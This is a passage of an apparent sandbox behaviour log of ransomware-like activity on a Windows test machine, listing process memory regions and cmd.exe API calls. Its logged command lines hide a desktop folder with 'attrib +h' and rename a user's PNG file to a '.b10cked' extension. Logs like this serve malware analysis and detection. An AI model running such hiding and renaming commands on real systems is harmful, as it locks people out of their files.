"c:\\windows\\system32\\usp10.dll") Region: id = 34297 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34298 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34299 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34300 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 34301 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34302 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 842 os_tid = 0x8b4 Process: id = "606" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0x8a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34306 start_va = 0x150000 end_va = 
0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34307 start_va = 0x4a0000 end_va = 0x4a6fff entry_point = 0x4a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34311 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34313 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34314 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34315 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34316 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 34317 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34318 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34319 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34320 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34321 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34322 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34323 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34324 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34325 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34326 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34327 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34328 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34329 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34330 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34331 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34332 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 844 os_tid = 0x7dc Process: id = "607" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" 
[0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34345 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34346 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34347 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34348 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34349 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34350 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34351 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34352 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34353 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34354 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 34581 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34582 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34583 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34584 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 34585 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 34586 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34587 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34588 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34589 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34590 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 34591 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34592 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34593 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34594 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34689 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 34690 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34691 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34692 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34693 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34694 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34695 start_va = 0xf0000 end_va = 0xf0fff entry_point = 
0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34696 start_va = 0x320000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34697 start_va = 0x540000 end_va = 0x6a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 34698 start_va = 0x740000 end_va = 0x133ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Thread: id = 845 os_tid = 0x9c8 [0231.853] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff5c | out: lpSystemTimeAsFileTime=0x24ff5c*(dwLowDateTime=0xbdbf5a40, dwHighDateTime=0x1d440a9)) [0231.853] GetCurrentProcessId () returned 0x8cc [0231.853] GetCurrentThreadId () returned 0x9c8 [0231.853] GetTickCount () returned 0x3fcc5 [0231.853] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff54 | out: lpPerformanceCount=0x24ff54*=28864195061) returned 1 [0231.853] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.853] __set_app_type (_Type=0x1) [0231.853] __p__fmode () returned 0x76b331f4 [0231.854] __p__commode () returned 0x76b331fc [0231.854] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.854] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.854] GetCurrentThreadId () returned 0x9c8 [0231.854] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c8) returned 0x38 [0231.854] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.854] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.854] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.920] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) 
returned 1 [0231.920] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24feec | out: phkResult=0x24feec*=0x0) returned 0x2 [0231.920] VirtualQuery (in: lpAddress=0x24ff23, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24febc, dwLength=0x1c | out: lpBuffer=0x24febc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.936] GetEnvironmentStringsW () returned 0x4501c8* [0231.936] FreeEnvironmentStringsW (penv=0x4501c8) returned 1 [0231.936] GetEnvironmentStringsW () returned 0x4501c8* [0231.937] FreeEnvironmentStringsW (penv=0x4501c8) returned 1 [0231.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee5c | out: phkResult=0x24ee5c*=0x40) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, 
lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegCloseKey (hKey=0x40) returned 0x0 [0231.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee5c | out: phkResult=0x24ee5c*=0x40) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x40, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x1, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x0, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x4, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x4) returned 0x0 [0231.937] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee64, lpData=0x24ee68, lpcbData=0x24ee60*=0x1000 | out: lpType=0x24ee64*=0x0, lpData=0x24ee68*=0x9, lpcbData=0x24ee60*=0x1000) returned 0x2 [0231.938] RegCloseKey (hKey=0x40) returned 0x0 [0231.938] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.938] srand (_Seed=0x5b8863bf) [0231.938] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" [0231.938] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" [0231.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.938] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x451928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.939] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.939] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CD") 
returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.939] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.939] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.939] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.939] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.939] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.939] GetEnvironmentStringsW () returned 0x452318* [0231.939] FreeEnvironmentStringsW (penv=0x452318) returned 1 [0231.939] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.939] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.939] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.939] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.939] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.939] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.939] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.939] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.940] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.940] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fc28, lpFilePart=0x24fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fc24*="Desktop") returned 0x18 [0231.940] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.940] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.940] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f9a4 | out: lpFindFileData=0x24f9a4) returned 0x450058 [0231.941] FindClose (in: hFindFile=0x450058 | out: hFindFile=0x450058) returned 1 [0231.941] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.941] SetCurrentDirectoryW 